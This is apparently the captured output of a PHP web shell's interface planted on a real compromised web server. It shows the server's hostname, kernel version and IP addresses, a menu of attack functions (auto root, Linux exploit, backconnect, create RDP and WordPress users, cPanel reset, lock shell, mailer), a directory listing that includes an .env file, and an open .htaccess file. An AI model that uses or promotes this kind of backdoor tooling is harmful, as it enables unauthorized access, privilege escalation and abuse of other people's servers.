Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 3.135.185.207
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
stripe /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.env
545
B
-rw-r--r--
_.htaccess
1.2
KB
-rw-r--r--
__config.php
622
B
-rw-r--r--
_edit.php
4.96
KB
-rw-r--r--
_edit.xml
447
B
-rw-r--r--
_upgrade.php
3.09
KB
-rw-r--r--
_upgrade.xml
383
B
-rw-r--r--
clone.php
9.47
KB
-rw-r--r--
error-404.html
3.68
KB
-rw-r--r--
error-500.html
3.58
KB
-rw-r--r--
extend.php
7.09
KB
-rw-r--r--
fileindex.php
160
B
-rw-r--r--
import.php
3.95
KB
-rw-r--r--
info.xml
3.39
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
10.26
KB
-rw-r--r--
install.xml
3.16
KB
-rw-r--r--
md5
1.72
KB
-rw-r--r--
notes.txt
1.99
KB
-rw-r--r--
update_pass.php
2.23
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _.htaccess
# # Whitelist appropriate assets files. # This file is automatically generated via File.allowed_extensions configuration # See AssetAdapter::renderTemplate() for reference. # # We disable PHP via several methods # Replace the handler with the default plaintext handler AddHandler default-handler php phtml php3 php4 php5 inc <IfModule mod_php5.c> # Turn the PHP engine off php_flag engine off </IfModule> <IfModule mod_rewrite.c> <IfModule mod_env.c> SetEnv HTTP_MOD_REWRITE On </IfModule> RewriteEngine On # Allow error pages RewriteCond %{REQUEST_FILENAME} -f RewriteRule error[^\\/]*\.html$ - [L] # Allow specific file extensions RewriteCond %{REQUEST_URI} !^[^.]*[^\/]*\.(?i:css|js|ace|arc|arj|asf|au|avi|bmp|brf|bz2|cab|cda|csv|dmg|doc|docx|dotx|flv|gif|gz|hqx|ico|jpeg|jpg|kml|m4a|m4v|mid|midi|mkv|mov|mp3|mp4|mpa|mpeg|mpg|ogg|ogv|pages|pcx|pdf|png|pps|ppt|pptx|potx|ra|ram|rm|rtf|sit|sitx|tar|tgz|tif|tiff|txt|wav|webm|webp|wma|wmv|xls|xlsx|xltx|zip|zipx|graphql)$ RewriteRule .* - [F] # Non existant files passed to requesthandler RewriteCond %{REQUEST_URI} ^(.*)$ RewriteCond %{REQUEST_FILENAME} !-f RewriteRule .* ../index.php [QSA] </IfModule>
Close